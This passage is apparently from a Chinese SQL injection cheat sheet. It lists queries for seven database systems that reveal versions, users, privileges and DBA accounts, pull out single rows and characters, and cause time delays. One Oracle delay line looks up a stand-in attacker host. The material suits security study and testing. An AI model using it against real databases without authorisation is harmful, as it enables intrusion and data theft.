select name, tbname, coltype from sysibm.syscolumns
-
获取版本
select versionnumber, version_timestamp from sysibm.sysversions
-
当前用户
select user from sysibm.sysdummy1
-
-
select session_user from sysibm.sysdummy1
-
-
select system_user from sysibm.sysdummy1
-
用户权限
select * from syscat.tabauth
管理员才能运行
-
select * from syscat.dbauth where grantee = 当前用户
-
-
select * from syscat.tabauth where grantee = 当前用户
-
-
select * from SYSIBM.SYSUSERAUTH
列出DB2系统权限
列出DBA账户
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’
-
选择第N行
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only
-
选择第N个字符
SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1
返回b
ASCII值-字符
select chr(65) from sysibm.sysdummy1
返回A
字符-ASCII值
select ascii(‘A’) from sysibm.sysdummy1
返回65
字符串连接
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1
返回abc
-
select ‘a’ || ‘b’ from sysibm.sysdummy1
返回ab
2、MySQL数据库
释义
SQL语句
其他
当前数据库
SELECT database()
-
所有数据库
SELECT schema_name FROM information_schema.schemata
版本>5.0
-
SELECT distinct(db) FROM mysql.db
管理员权限才可以执行
查询表名
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
-
查询列名
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
-
获取版本
SELECT @@version
-
当前用户
SELECT user()
-
-
SELECT system_user()
-
用户权限
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges
用户权限
-
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges
数据库权限
-
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges
字段的权限
列出DBA账户
SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’
-
选择第N行
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0
行从0开始编号
-
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1
行从0开始编号
选择第N个字符
SELECT substr(‘abcd’, 3, 1)
返回c
ASCII值-字符
SELECT char(65)
返回A
字符-ASCII值
SELECT ascii(‘A’)
返回65
字符串连接
SELECT CONCAT(‘A’,’B’)
返回AB
-
SELECT CONCAT(‘A’,’B’,’C’)
返回ABC
时间睡眠
SELECT BENCHMARK(1000000,MD5(‘A’))
-
-
SELECT SLEEP(5)
版本>= 5.0.12
3、Oracle数据库
释义
SQL语句
其他
当前数据库
SELECT global_name FROM global_name
—
-
SELECT name FROM v$database
—
-
SELECT instance_name FROM v$instance
—
-
SELECT SYS.DATABASE_NAME FROM DUAL
—
所有数据库
SELECT DISTINCT owner FROM all_tables
—
查询表名
SELECT table_name FROM all_tables
—
-
SELECT owner, table_name FROM all_tables
—
查询列名
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’
—
-
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’
—
获取版本
SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’
—
-
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’
—
-
SELECT version FROM v$instance
—
当前用户
SELECT user FROM dual
—
用户权限
SELECT * FROM session_privs
当前权限
-
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’
列出用户的权限
列出DBA账户
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’
—
选择第N行
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9
第九行
选择第N个字符
SELECT substr(‘abcd’, 3, 1) FROM dual
第3个字符c
ASCII值-字符
SELECT chr(65) FROM dual
返回A
字符-ASCII值
SELECT ascii(‘A’) FROM dual
返回65
字符串连接
SELECT ‘A’ || ‘B’ FROM dual
返回AB
时间睡眠
SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual
如果反向查询很慢
-
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual
如果正向查询很慢
4、MSSQL数据库
释义
SQL语句
其他
当前数据库
SELECT DB_NAME()
-
所有数据库
SELECT name FROM master..sysdatabases
-
-
SELECT DB_NAME(N)
N为0,1,2,…
查询表名
SELECT name FROM master..sysobjects WHERE xtype = ‘U’
-
-
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’
-
查询列名
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’)
当前数据库
-
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’
列出master..sometable的列名称
获取版本
SELECT @@version
-
当前用户
SELECT user_name()
-
-
SELECT system_user
-
-
SELECT user
-
用户权限
SELECT permission_name FROM master..fn_my_permissions(null,‘DATABASE’)
当前数据库权限
-
SELECT is_srvrolemember(‘sysadmin’)
当前用户权限
列出DBA账户
SELECT is_srvrolemember(‘sysadmin’)
当前用户是否是管理员,是则返回1
选择第N行
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC
返回第九行
选择第N个字符
SELECT substring(‘abcd’, 3, 1)
返回c
ASCII值-字符
SELECT char(0×41)
返回A
字符-ASCII值
SELECT ascii(‘A’)
返回65
字符串连接
SELECT ‘A’ + ‘B’
返回AB
时间睡眠
WAITFOR DELAY ‘0:0:5’
睡眠5秒
5、PostgreSQL数据库
释义
SQL语句
其他
当前数据库
SELECT current_database()
-
所有数据库
SELECT datname FROM pg_database
-
查询表名
SELECT relname, A.attname FROM pg_class C, pg_namespace N,pg_attribute A, pg_type T WHERE (C.relkind=’r’) AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)
-
查询列名
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
-
获取版本
SELECT version()
-
当前用户
SELECT user;
-
-
SELECT current_user;
-
-
SELECT session_user;
-
-
SELECT usename FROM pg_user;
-
-
SELECT getpgusername();
-
用户权限
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
-
列出DBA账户
SELECT usename FROM pg_user WHERE usesuper IS TRUE
-
选择第N行
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0
从0行开始编号
-
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
-
选择第N个字符
SELECT substr(‘abcd’, 3, 1)
返回c
ASCII值-字符
SELECT chr(65)
返回A
字符-ASCII值
SELECT ascii(‘A’)
返回65
字符串连接
SELECT ‘A’ || ‘B’
返回AB
时间睡眠
SELECT pg_sleep(10)
睡眠10秒
-
SELECT sleep(10)
创建自定义睡眠
6、Ingres数据库
释义
SQL语句
其他
当前数据库
select dbmsinfo(‘database’);
-
所有数据库
SELECT name FROM iidatabase
连接到数据库
查询表名
select table_name, table_owner from iitables;
-
-
select relid, relowner, relloc from iirelation;
-
-
select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;
-
查询列名
select column_name, column_datatype, table_name, table_owner from iicolumns;
-
获取版本
select dbmsinfo(‘_version’)
-
当前用户
select dbmsinfo(‘session_user’)
-
-
select dbmsinfo(‘system_user’)
-
用户权限
select dbmsinfo(‘db_admin’)
-
-
select dbmsinfo(‘create_table’)
-
-
select dbmsinfo(‘create_procedure’)
-
-
select dbmsinfo(‘security_priv’)
-
-
select dbmsinfo(‘select_syscat’)
-
选择第N行
select first 10 blah form table
选择前10位的表
选择第N个字符
select substr(‘abc’, 2, 1)
返回b
ASCII值-字符
-
-
字符-ASCII值
-
-
字符串连接
select ‘abc’ || ‘def’
返回abcdef
时间睡眠
-
-
7、Infomix数据库
释义
SQL语句
其他
当前数据库
SELECT DBSERVERNAME FROM systables where tabid = 1
-
所有数据库
select name, owner from sysdatabases;
-
查询表名
select tabname, owner FROM systables;
-
-
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;
-
查询列名
select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;
-
获取版本
SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1
-
-
SELECT DBINFO(‘version’, ‘server-type’) FROM systables WHERE tabid = 1
-
当前用户
SELECT USER FROM systables WHERE tabid = 1
-
-
select CURRENT_ROLE FROM systables WHERE tabid = 1
-
用户权限
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid
哪些用户可以访问哪些程序
选择第N行
select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc
选择第10行
选择第N个字符
SELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1
返回C
ASCII值-字符
-
-
字符-ASCII值
select ascii(‘A’) from systables where tabid = 1
返回65
字符串连接
SELECT ‘A’ || ‘B’ FROM systables where tabid = 1
返回AB
-
SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1